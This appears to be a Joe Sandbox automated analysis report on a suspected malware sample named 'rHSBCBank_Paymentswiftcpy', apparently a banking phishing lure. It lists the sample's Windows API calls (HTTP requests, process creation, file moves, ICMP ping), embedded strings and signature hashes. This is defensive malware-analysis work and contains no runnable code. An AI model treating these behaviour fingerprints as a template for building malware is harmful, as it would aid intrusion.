                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                • String ID: Ping
                                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                                • Opcode ID: 7e9218a6909d36a408f98feb687d12d8d1cf8fa3879394f975a74600690275a0
                                                                                                                                • Instruction ID: 45e8adf1f20c0e602a194de9788db1ce9ba6b56eb40f47680e518310a82958c3
                                                                                                                                • Opcode Fuzzy Hash: 7e9218a6909d36a408f98feb687d12d8d1cf8fa3879394f975a74600690275a0
                                                                                                                                • Instruction Fuzzy Hash: D7516D71604710DFDB11AF64EC49F2AB7E4EF49720F048929F996DB2A1DB38E900DB45
                                                                                                                                APIs
                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0078B4D0
                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0078B546
                                                                                                                                • GetLastError.KERNEL32 ref: 0078B550
                                                                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 0078B5BD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                                • Opcode ID: 242b57d26e20d18d0de06708beb3af89e53eb23f5728496ccd95d1b3644b9ad7
                                                                                                                                • Instruction ID: 71634be749ac2ae5ec5952bd696409f149946cb5ceec5d0787bea0a1e0b49e02
                                                                                                                                • Opcode Fuzzy Hash: 242b57d26e20d18d0de06708beb3af89e53eb23f5728496ccd95d1b3644b9ad7
                                                                                                                                • Instruction Fuzzy Hash: 61319075A40209DFCB10FFA8D889EAE7BB4FF49310F148126F505D7291DB789A52CB91
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                  • Part of subcall function 0077AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0077AABC
                                                                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00779014
                                                                                                                                • GetDlgCtrlID.USER32 ref: 0077901F
                                                                                                                                • GetParent.USER32 ref: 0077903B
                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 0077903E
                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00779047
                                                                                                                                • GetParent.USER32(?), ref: 00779063
                                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00779066
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                • API String ID: 1536045017-1403004172
                                                                                                                                • Opcode ID: 36ff2b06165cf4de50e00229393e9b68d5ac4295b71e9a8353d8895af32e079a
                                                                                                                                • Instruction ID: a44a24a05d34a2af07a70a0de2c2391bd8591225f8ccf31c22d2f1a4fa24ee0f
                                                                                                                                • Opcode Fuzzy Hash: 36ff2b06165cf4de50e00229393e9b68d5ac4295b71e9a8353d8895af32e079a
                                                                                                                                • Instruction Fuzzy Hash: BB21F870A00108FBDF04ABA0CC89EFEBB74EF86310F108115F965972A1DB7D5815DB20
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                  • Part of subcall function 0077AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0077AABC
                                                                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007790FD
                                                                                                                                • GetDlgCtrlID.USER32 ref: 00779108
                                                                                                                                • GetParent.USER32 ref: 00779124
                                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00779127
                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00779130
                                                                                                                                • GetParent.USER32(?), ref: 0077914C
                                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 0077914F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                                • API String ID: 1536045017-1403004172
                                                                                                                                • Opcode ID: d19997302ce83134fe7a0b3c96679dc43b315fe6fd61d9bd4f5e987b3b052e6c
                                                                                                                                • Instruction ID: c9ea08607bda9865842a8c230c7e5b4d8492ee2a5b07be919dda8221f3931f7d
                                                                                                                                • Opcode Fuzzy Hash: d19997302ce83134fe7a0b3c96679dc43b315fe6fd61d9bd4f5e987b3b052e6c
                                                                                                                                • Instruction Fuzzy Hash: CC210474A00108FBDF14ABA4CC89EFEBB78EF89300F008016FA55972A1DB7D5819DB20
                                                                                                                                APIs
                                                                                                                                • GetParent.USER32 ref: 0077916F
                                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00779184
                                                                                                                                • _wcscmp.LIBCMT ref: 00779196
                                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00779211
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                • API String ID: 1704125052-3381328864
                                                                                                                                • Opcode ID: 1945b15b45cf8ed44b34acd5fea663eca633a2cbbef6be74778949dd7d01cb62
                                                                                                                                • Instruction ID: 2a57230b8a9dafd3a201b579a1a2d25a6ebb550ea4ce0beda369968d97214fe4
                                                                                                                                • Opcode Fuzzy Hash: 1945b15b45cf8ed44b34acd5fea663eca633a2cbbef6be74778949dd7d01cb62
                                                                                                                                • Instruction Fuzzy Hash: 20112777289317FAFE143624DC1EDA737ACAB11360B604026FA04E40D3FE6DA8215584
                                                                                                                                APIs
                                                                                                                                • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00787A6C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ArraySafeVartype
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1725837607-0
                                                                                                                                • Opcode ID: 026636953163e951e3edeaf7644445bef464cd7bf269851019d79a3775e33f80
                                                                                                                                • Instruction ID: c4c29c46980357e9b43497d13973e5084e2ab47ac0b5471239def9b6f9c6a5d2
                                                                                                                                • Opcode Fuzzy Hash: 026636953163e951e3edeaf7644445bef464cd7bf269851019d79a3775e33f80
                                                                                                                                • Instruction Fuzzy Hash: 80B19371944219DFDB04EFA4C884BBEBBB9FF49321F244429E602E7251D738E941CBA0
                                                                                                                                APIs
                                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0072FAA6
                                                                                                                                • OleUninitialize.OLE32(?,00000000), ref: 0072FB45
                                                                                                                                • UnregisterHotKey.USER32(?), ref: 0072FC9C
                                                                                                                                • DestroyWindow.USER32(?), ref: 007645D6
                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0076463B
                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00764668
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                • String ID: close all
                                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                                • Opcode ID: 942241a290e3781bcbe07a3819f8a2509581cebcc1456d2ade0f6ccc939af975
                                                                                                                                • Instruction ID: 5ff9698a691347d0818317105d63525235f9a13cd2cff1ef12d01c623a280448
                                                                                                                                • Opcode Fuzzy Hash: 942241a290e3781bcbe07a3819f8a2509581cebcc1456d2ade0f6ccc939af975
                                                                                                                                • Instruction Fuzzy Hash: 81A19070701222CFDB19EF14D598A69F774BF05700F5442BDE90AAB262DB38AC56CF50
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$ClearInit$_memset
                                                                                                                                • String ID: ,,{$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                • API String ID: 2862541840-3894331932
                                                                                                                                • Opcode ID: 2768303dacec087b858cc6a356dedb7938fc4b961cedead05a6f6576f9894900
                                                                                                                                • Instruction ID: 1bd00cc4b08f7f5d70c9878be55ccb83555c4c898b28831503e6782e65ca2942
                                                                                                                                • Opcode Fuzzy Hash: 2768303dacec087b858cc6a356dedb7938fc4b961cedead05a6f6576f9894900
                                                                                                                                • Instruction Fuzzy Hash: 06917E71A00219EBEF24DFA9D848FAEB7B8EF45710F10815DF615AB280D7789945CFA0
                                                                                                                                APIs
                                                                                                                                • EnumChildWindows.USER32(?,0077A439), ref: 0077A377
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ChildEnumWindows
                                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                • API String ID: 3555792229-1603158881
                                                                                                                                • Opcode ID: 7e3057141bbea2686cbd22153833c2220c634bf84d5cd1271b2055edfd930b56
                                                                                                                                • Instruction ID: 2b95c41e43d97c170ace69db57688e31980a946d9f66d9ea965ccf96cc1d6178
                                                                                                                                • Opcode Fuzzy Hash: 7e3057141bbea2686cbd22153833c2220c634bf84d5cd1271b2055edfd930b56
                                                                                                                                • Instruction Fuzzy Hash: DE91AF31A04606EAEF08DFA0C459BEDFB74BF84340F54C129E84DA7251DB396999CBD1
                                                                                                                                APIs
                                                                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 00722EAE
                                                                                                                                  • Part of subcall function 00721DB3: GetClientRect.USER32(?,?), ref: 00721DDC
                                                                                                                                  • Part of subcall function 00721DB3: GetWindowRect.USER32(?,?), ref: 00721E1D
                                                                                                                                  • Part of subcall function 00721DB3: ScreenToClient.USER32(?,?), ref: 00721E45
                                                                                                                                • GetDC.USER32 ref: 0075CD32
                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0075CD45
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0075CD53
                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0075CD68
                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0075CD70
                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0075CDFB
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                • String ID: U
                                                                                                                                • API String ID: 4009187628-3372436214
                                                                                                                                • Opcode ID: 413ed54c66d8f6af3072921c53051b0d0b6ab3033bb57c45573b63cd03f640c8
                                                                                                                                • Instruction ID: b721aebddb6d9c9b383bade7a42b385d583ce4a596425b76ee70abc8be7660e0
                                                                                                                                • Opcode Fuzzy Hash: 413ed54c66d8f6af3072921c53051b0d0b6ab3033bb57c45573b63cd03f640c8
                                                                                                                                • Instruction Fuzzy Hash: 4471D231900309EFCF229F64CC84BEA7BB5FF49315F18426AED559A2A6C7788C45DB60
                                                                                                                                APIs
                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00791A50
                                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00791A7C
                                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00791ABE
                                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00791AD3
                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00791AE0
                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00791B10
                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00791B57
                                                                                                                                  • Part of subcall function 00792483: GetLastError.KERNEL32(?,?,00791817,00000000,00000000,00000001), ref: 00792498
                                                                                                                                  • Part of subcall function 00792483: SetEvent.KERNEL32(?,?,00791817,00000000,00000000,00000001), ref: 007924AD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2603140658-3916222277
                                                                                                                                • Opcode ID: d3e947783936d35bf35bdb94e938e746bc164116ac1f0fdf15903fa4136e1edb
                                                                                                                                • Instruction ID: c884b6f07889c1a98bb8a487e564d189d6699d3851abae64f6a448b2450ed1bf
                                                                                                                                • Opcode Fuzzy Hash: d3e947783936d35bf35bdb94e938e746bc164116ac1f0fdf15903fa4136e1edb
                                                                                                                                • Instruction Fuzzy Hash: 9341A1B1501219BFEF119F60DC89FFB7BADEF09350F408126F9059A191E7789E508BA4
                                                                                                                                APIs
                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007AF910), ref: 00798D28
                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007AF910), ref: 00798D5C
                                                                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00798ED6
                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00798F00
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 560350794-0
                                                                                                                                • Opcode ID: cf1ec89319b09b657a5bf7e3d5803ae0aa8a7cd5b6091f8ed29759d9aff2d762
                                                                                                                                • Instruction ID: ead94d182b7f0ef84ff2896580815e372ad31fd21e535436227707b51ebdae73
                                                                                                                                • Opcode Fuzzy Hash: cf1ec89319b09b657a5bf7e3d5803ae0aa8a7cd5b6091f8ed29759d9aff2d762
                                                                                                                                • Instruction Fuzzy Hash: 39F19D71A00209EFDF44DF98D888EAEB7B9FF49314F108098F915AB251DB35AE41CB61
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 0079F6B5
                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0079F848
                                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0079F86C
                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0079F8AC
                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0079F8CE
                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0079FA4A
                                                                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0079FA7C
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0079FAAB
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0079FB22
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4090791747-0
                                                                                                                                • Opcode ID: b1988d9a0c94d3b52792b78608ae1ab9cb5dd21fb964bf9044a911f384a35794
                                                                                                                                • Instruction ID: 6eb08110bedbd5f6ed78393803d5af8200fd15297c7013eb677daa211f336274
                                                                                                                                • Opcode Fuzzy Hash: b1988d9a0c94d3b52792b78608ae1ab9cb5dd21fb964bf9044a911f384a35794
                                                                                                                                • Instruction Fuzzy Hash: 2EE1AF71604300DFCB14EF24D885B6ABBE1EF85354F18856DF9999B2A2DB38EC41CB52
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 0078466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00783697,?), ref: 0078468B
                                                                                                                                  • Part of subcall function 0078466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00783697,?), ref: 007846A4
                                                                                                                                  • Part of subcall function 00784A31: GetFileAttributesW.KERNEL32(?,0078370B), ref: 00784A32
                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00784D40
                                                                                                                                • _wcscmp.LIBCMT ref: 00784D5A
                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00784D75
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 793581249-0
                                                                                                                                • Opcode ID: 62e713dccb7172ac835fbabb67aa8a2a48410f5c66496d2256b9777e8efd50f9
                                                                                                                                • Instruction ID: 42a402f9a89551f9be4dd5391ee467a34b6f12958199d77fb95f28792939ae83
                                                                                                                                • Opcode Fuzzy Hash: 62e713dccb7172ac835fbabb67aa8a2a48410f5c66496d2256b9777e8efd50f9
                                                                                                                                • Instruction Fuzzy Hash: A05175B2548385DBC724EBA0D8859DFB3ECAF85310F40492EF689D3151EF78A588C766
                                                                                                                                APIs
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007A86FF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
